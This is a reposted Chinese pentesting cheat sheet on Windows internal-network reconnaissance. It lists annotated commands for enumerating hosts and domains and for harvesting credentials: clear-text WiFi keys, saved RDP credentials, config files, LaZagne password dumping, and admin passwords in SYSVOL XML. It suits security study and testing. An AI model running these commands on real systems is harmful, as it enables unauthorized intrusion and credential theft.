内网渗透之信息搜集-windows篇

admin 2022年6月21日16:11:53安全文章评论9 views1335字阅读4分27秒阅读模式

当前主机信息收集

常用信息收集

whoami  #查看当前用户权限net user  #查看所有用户query user #查看当前在线用户ipconfig /all #查看ip/dns等信息route print  #查看路由表信息arp -a #查看arp解析情况tasklist /svc #查看进程及对应服务名net localgroup administrators #查看管理员组成员systeminfo #查看系统补丁信息net use #查看IPC连接情况net share #查看文件共享net view #查看匿名共享情况netsh firewall show state #查看防火墙状态cmdkey /l #查看当前保存的登陆凭证

密码搜集

netsh wlan show profiles # 查看连接过的wifi名称netsh wlan show profile name="wifi名称" key=clear # 查看wifi的密码dir /a %userprofile%AppDataLocalMicrosoftCredentials* # 查看RDP连接凭证dir /a /s /b "网站目录*config*" > 1.txt # 数据库配置文件laZagne.exe all -oN # 本地wifi/浏览器等密码dir %APPDATA%MicrosoftWindowsRecent # 查看最近打开的文档

连通性

ping www.baidu.com # ICMP连通性nslookup www.baidu.com # DNS连通性curl https://www.baidu.com # http连通性nc ip port # TCP连通性

域信息收集

常用信息搜集

net config workstation #查看当前登录域net user /domain # 获得所有域用户列表net view /domain # 查看所有的域net view /domain:XXX # 查看该域内所有主机net group /domain # 查看所有域用户组列表net group "domain computers" /domain # 查看域内所有的主机名net group "domain admins" /domain # 查看所有域管理员net group "domain controllers" /domain # 查看所有域控制器net group "enterprise admins" /domain # 查看所有企业管理员nltest /domain_trusts # 获取域信任信息net time /domain # 查看当前登录域net accounts /domain # 查看域密码策略dsquery server # 寻找目录中的域控制器netdom query pdc # 查看域控制器主机名wmic useraccount get /all #获取域内用户的详细信息

环境信息搜集

nbtscan.exe xx.xx.xx.xx/24 # 查看c段机器csvde.exe -f 1.csv -k # 批量导入/导出AD用户setspn.exe -T xx.xx.xx.xx -Q / # 查看当前域内所有spn

密码搜集

dir /s /a 域控IPSYSVOL*.xml # 获取域里面所有机子的本地管理员账号密码


原文始发于微信公众号(星冥安全):内网渗透之信息搜集-windows篇

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月21日16:11:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  内网渗透之信息搜集-windows篇 http://cn-sec.com/archives/1131840.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: